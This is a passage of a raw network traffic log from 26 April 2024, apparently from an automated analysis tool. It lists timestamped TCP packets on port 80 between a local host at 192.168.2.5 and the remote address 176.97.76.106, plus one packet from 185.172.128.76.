Apr 26, 2024 17:11:11.467220068 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467307091 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467313051 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467349052 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467365026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467401981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467406988 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467439890 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467444897 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467482090 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467494011 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467530966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467539072 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467569113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467571020 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467611074 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467670918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467711926 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467741013 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467782021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467809916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467856884 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467863083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467900038 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467900991 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467941046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.467947006 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.467979908 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468043089 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468080044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468086958 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468122959 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468172073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468209028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468218088 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468252897 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468278885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468316078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468323946 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468353033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468355894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468393087 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468421936 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468461037 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468461990 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468502045 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468528986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468565941 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468573093 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468610048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468635082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468703032 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468703985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468739986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468749046 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468785048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468839884 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468878031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468887091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468914032 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.468920946 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468951941 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.468982935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.469024897 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.469053984 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.469095945 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.469156981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.469197989 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.489428043 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.489521980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.489562988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.489599943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.489626884 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.489658117 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.491904020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.491944075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.491985083 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492018938 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492027998 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492064953 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492065907 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492119074 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492126942 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492156982 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492161036 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492201090 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492228985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492264986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492275000 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492311001 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492336988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492392063 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492430925 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492475986 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492521048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492558002 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492567062 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492598057 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492600918 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492644072 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492744923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492782116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492793083 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492826939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492851973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492889881 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492914915 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.492959976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.492986917 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.493089914 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.495799065 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.512459993 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:11.727458000 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.727657080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.727710009 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.729710102 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.729816914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.729861021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.729933977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730038881 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730078936 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730113029 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730180979 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730204105 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730218887 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730226040 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730247021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730262041 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730307102 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730345964 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730355978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730396986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730420113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730438948 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730441093 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730478048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730602980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730648994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730688095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730714083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730736017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730772018 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730799913 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730839968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.730878115 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.730909109 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.731040001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.731060982 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.731081963 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.731081963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.731139898 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.731590033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.731693983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.731715918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.731735945 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.731739044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.731775999 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.732059956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732083082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732115984 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732120037 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.732259035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732300997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732302904 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.732467890 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732510090 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.732760906 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732784033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732817888 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.732924938 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732945919 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.732981920 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.733479977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.733503103 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.733551025 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.733556986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.733692884 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.733731985 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.733741999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.733966112 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.733988047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734009027 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734101057 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734139919 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734164000 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734185934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734224081 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734272957 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734294891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734330893 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734361887 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734383106 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734404087 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734420061 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734425068 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734445095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734462023 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734476089 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734498024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734513044 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734539032 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734561920 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734576941 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734618902 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734639883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734656096 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734672070 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734694004 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734709024 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734715939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734735966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734750032 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.734756947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.734803915 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.760142088 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760174990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760216951 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.760251045 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760365009 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760389090 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760410070 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760418892 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.760445118 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.760471106 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760613918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760653973 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.760783911 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760807037 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760829926 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760848045 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.760864019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760885954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760900021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.760905981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760940075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760941982 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.760960102 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760981083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.760999918 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761006117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761028051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761042118 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761046886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761068106 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761082888 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761087894 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761107922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761122942 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761128902 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761149883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761164904 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761171103 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761192083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761204004 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761214018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761234045 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761251926 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761255980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761276960 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761291981 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761296988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761317968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761332035 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761362076 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761415005 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761606932 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761687040 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761708975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761727095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761732101 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761769056 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761785984 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761882067 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.761919975 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.761950016 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762036085 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762073040 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.762125969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762315035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762356997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.762480021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762569904 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762593031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762610912 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.762614012 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762646914 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.762679100 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762777090 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762816906 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.762844086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762866020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762897968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762901068 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.762938023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.762974977 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763000011 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763022900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763058901 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763123989 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763202906 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763243914 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763273954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763446093 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763489008 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763510942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763530970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763554096 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763573885 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763576031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763597965 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763612986 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763618946 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763638973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763650894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763659954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763679981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763694048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763700962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763734102 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763780117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763814926 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763835907 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763856888 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763859987 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763875961 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763896942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763904095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763916969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763933897 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763937950 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763959885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.763974905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.763982058 CEST	80	49713	176.97.76.106	192.168.2.5
